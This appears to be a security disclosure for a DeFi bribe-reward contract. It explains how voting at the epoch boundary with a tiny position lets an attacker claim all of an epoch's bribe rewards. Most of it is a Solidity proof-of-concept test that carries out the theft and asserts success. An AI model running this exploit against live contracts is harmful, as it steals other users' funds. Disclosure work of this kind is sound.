If an attacker call Voter.distribute at _lastEpochStart + DURATION, then Bribe.resetVoting function is triggered and totalVoting is updated to 0. And then if the attacker call Voter.vote function the same params (or tokenId with less votingPower), then Bribe._writeVotingCheckpoint is triggered and votingCheckpoints[getPriorVotingIndex(_lastEpochEnd)].votes is updated with the new votes. And the attacker claim the reward at the next block before other users claim. The smaller the new vote amount, the more rewards the attacker can steal.
Impact Details
The attacker can steal reward and other users can't claim the reward.
// SPDX-License-Identifier: GPL-3
pragma solidity ^0.8.15;
import "./BaseTest.sol";
contract BribePoC is BaseTest {
uint256 constant DURATION = 2 weeks;
uint256 constant SECONDS_PER_BLOCK = 12;
uint256 public epochTime;
uint256 public epochBlock;
function setUp() public {
epochTime = minter.activePeriod();
epochBlock = block.number;
function goNextEpoch() private {
epochTime = epochTime + DURATION;
epochBlock = epochBlock + DURATION / 12;
function testBugPriorBalanceIndex() public {
address bribeAddress = voter.bribes(address(sushiGauge));
address[] memory pools = new address[](1);
pools[0] = sushiPoolAddress;
uint256[] memory weights = new uint256[](1);
weights[0] = 10000;
// go epoch 1
// at start time of epoch 1
uint256 targetTokenId = createVeAlcx(admin, TOKEN_1, MAXTIME, false);
uint256 userTokenId = createVeAlcx(beef, TOKEN_1 * 1000, MAXTIME, false);
createThirdPartyBribe(bribeAddress, bal, TOKEN_100K);
voter.vote(targetTokenId, pools, weights, 0);
voter.vote(userTokenId, pools, weights, 0);
// totalVoting = (1 + 1000) * votingPowerPerTokenAtMaxtime = 1001 * votingPowerPerTokenAtMaxtime
// reward expected for targetTokenId = 100K * 1 / 1001 = 100/1001 K
// go epoch 2
// at start time of epoch 2
createThirdPartyBribe(bribeAddress, bal, TOKEN_100K);
// create a new token with same amount
uint256 supportTokenId = createVeAlcx(admin, TOKEN_1, MAXTIME, false);
// at start time of epoch 2
voter.vote(supportTokenId, pools, weights, 0);
// after this tx, the totalVoting = 1 * votingPowerPerTokenAtMaxtime
// earnedAmount = 100K * 1 / 1 = 100 K
// it means that the smaller the voting power of the supportTokenId, the more rewards it can steal.
// but this is not calculated because of block.timestamp == _lastEpochEndthis in Bribe.sol
// if (block.timestamp > _lastEpochEnd) {
// reward += (cp.balanceOf * tokenRewardsPerEpoch[token][_lastEpochStart]) / _priorSupply;
// }
// so the attacker waits for the next block
hevm.warp(block.timestamp + SECONDS_PER_BLOCK);
hevm.roll(block.number + 1);
// in the second block of epoch 2
address[] memory bribes = new address[](1);
bribes[0] = address(bribeAddress);
address[][] memory tokens = new address[][](1);
tokens[0] = new address[](1);
tokens[0][0] = bal;
uint256 beforeBalOfAdmin = IERC20(bal).balanceOf(admin);
voter.claimBribes(bribes, tokens, targetTokenId);
uint256 deltaBalOfAdmin = IERC20(bal).balanceOf(admin) - beforeBalOfAdmin;
// The success means the attacker stole all reward of epoch 1
// In the Bribe contract, rewards for other users who have not claimed for a long time, including rewards from new epoch, may remain.
// The attacker can steal all these funds.
assertEq(TOKEN_100K, deltaBalOfAdmin, "The attack is failed");